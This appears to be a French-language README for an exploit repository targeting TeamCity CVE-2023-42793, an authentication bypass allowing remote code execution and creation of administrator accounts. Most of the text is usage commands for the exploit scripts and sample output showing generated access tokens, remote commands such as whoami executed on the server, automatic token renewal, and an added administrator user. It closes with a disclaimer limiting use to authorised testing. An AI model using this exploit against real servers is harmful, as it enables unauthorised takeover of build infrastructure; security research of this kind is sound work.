
Exploit pour TeamCity CVE-2023-42793 permettant l'exécution de code à distance et la création de compte administrateur via un contournement d'authentification basée sur les jetons.
Exemple d'exécution de commande :
python3 exploit.py -u http://localhost
User add token -> eyJ0eXAiOiAiVENWMiJ9.YkZ0V2tzR3NvWXhZelRfZTN0cFF1SkZjVWVz.N2M0Njk2ZTgtNWZhYi00MTU5LWJmZjQtYWU1MDFlYzZiMGY1
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser
StdErr:
Exit code: 0
Time: 16ms
Command -> ls -la /home
StdOut:total 8
drwxr-xr-x 2 root root 4096 Apr 15 2020 .
drwxr-xr-x 1 root root 4096 Feb 28 2024 ..
StdErr:
Exit code: 0
Time: 23ms
En cas d'expiration du jeton, un nouveau sera créé automatiquement.
Command -> whoami
[-] Token expired, restarting...
[!]Error deleting user
User add token -> eyJ0eXAiOiAiVENWMiJ9.ZVJiSTB6SGZWSEpldzhEa1o4cUdsWFlQRTJJ.NGQxOTg4ZWItNTJmYS00OWM3LWIwYmItZjcyODNkYjg5NTJj
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser
StdErr:
Exit code: 0
Time: 24ms
Créer un nom d'utilisateur administrateur :
python3 user_add_administrator.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token -> eyJ0eXAiOiAiVENWMiJ9.Z21xU3ZtTXNYUXE2WGdkaWJCOFV4QWsxN2s0.NmMyZDE0YTItMDQ1OS00NGQ2LTk2YWEtNjg1MTU3ZGNiNjM0
Create username administrator
En cas d'utilisateur existant :
python3 user_add.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token -> eyJ0eXAiOiAiVENWMiJ9.Q3ZFa0ExR2tBcGlSMUZ3ZWNyMUtNN0VPQmFN.Mzk0M2EyZjAtMzVhNi00YTU0LWFmNTctMTg4MThkZmU5MDA3
is already in use by some other user.
Ce dépôt est destiné uniquement à des fins éducatives et de recherche en sécurité informatique. L'utilisation des scripts et techniques décrits ici pour compromettre des systèmes sans autorisation est illégale et viole les lois nationales et internationales, telles que la Loi 26.388 (Argentine), la CFAA (États-Unis) et la Convention de Budapest.
L'auteur n'est pas responsable de l'utilisation abusive des informations fournies ici. L'utilisation de ce matériel est autorisée uniquement dans des environnements contrôlés, des laboratoires, des CTF, ou avec l'autorisation explicite du propriétaire du système.
Si vous allez effectuer des tests, assurez-vous d'avoir la permission. Pirater sans autorisation n'est pas du hacking éthique ; c'est un crime.